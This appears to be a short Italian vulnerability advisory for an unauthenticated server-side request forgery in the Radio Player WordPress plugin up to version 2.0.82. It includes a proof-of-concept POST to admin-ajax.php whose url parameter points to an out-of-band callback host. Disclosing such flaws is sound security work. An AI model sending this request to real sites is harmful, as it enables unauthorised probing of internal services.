
Radio Player <= 2.0.82 - Server-Side Request Forgery cieca non autenticata
Radio Player <= 2.0.82 - Server-Side Request Forgery non autenticata
Il plugin per WordPress Radio Player – Live Shoutcast, Icecast and Any Audio Stream Player è vulnerabile a Server-Side Request Forgery in tutte le versioni fino alla 2.0.82 inclusa. Ciò consente a utenti non autenticati di effettuare richieste web verso posizioni arbitrarie originate dall'applicazione web, che possono essere utilizzate per interrogare e modificare informazioni dai servizi interni.
POST /wp-admin/admin-ajax.php HTTP/2
Host: wp-dev.ddev.site
Content-Type: application/x-www-form-urlencoded
Content-Length: 127
action=radio_player_get_stream_data&nonce=feb9ecfbfa&utm_source=&url=http://918sodewycbbjnbts7cxy5bqyh48s0gp.bc.oast.site/live.m3u8